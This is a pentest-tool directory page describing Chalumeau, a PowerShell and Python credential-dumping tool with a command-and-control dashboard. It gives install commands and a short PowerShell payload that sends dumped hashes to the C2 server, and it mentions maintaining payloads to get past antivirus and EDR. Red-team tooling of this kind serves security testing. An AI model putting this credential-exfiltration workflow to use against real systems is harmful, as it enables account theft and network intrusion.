Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
chalumeau — Chalumeau is automated,extendable and customizable credential dumping tool based on powershell and python. | Kitploit
Tools/GitHubGitHub/cyberstruggle/chalumeau
Password AttacksPost-ExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubcyberstruggle/chalumeau

chalumeau

Chalumeau is automated,extendable and customizable credential dumping tool based on powershell and python.

View Repository
102196 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share


Chalumeau

Chalumeau is automated,extendable and customizable credential dumping tool based on powershell and python.

Main Features

  • Write your own Payloads
  • In-Memory execution
  • Extract Password List
  • Dashboard reporting / Web Interface
  • Parsing Mimikatz
  • Dumping Tickets

Screenshots


Known Issues

  • Parsing Mimikatz dcsync (working on fix)
  • Bypassing Antivirus and EDRs , you will need to maintain your payloads

TODO

  • Encrypted Communication
  • Automated Lateral movement
  • Automated Password Spraying
  • Automated Hash Cracking

Using

root@kitploit:~
git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh

# Run
chmod +x start.sh

sudo ./start.sh

Write your own payload

obfuscate your own powershell payload for dumping credentials and use chalumeau function call without any imports chalumeau will Encrypt and contact with the c2 and sending the dumped credentials. just save the file under chalumeau-power/payloads

  • Using ChalumeauSendCredentials Function
    • ChalumeauSendCredentials
      • Secret = the dumped hash or clear text password (string)
      • Username = the username of id of the dumped credential (string)
      • IsClearText = 1 if it's clear text 0 if it's not (int)
      • Source = mention the Source payload like "Mimikatz Hash" (string)
root@kitploit:~
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
    ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
} 

Credits

  • wazehell Author
  • Invoke-Obfuscation Daniel Bohannon
  • Invoke-Mimikatz PowerSploit
  • Get-PassHashes nishang
  • Chalumeau Logo Aureliano
  • Invoke-MassMimikatz PowerTools
Download Tool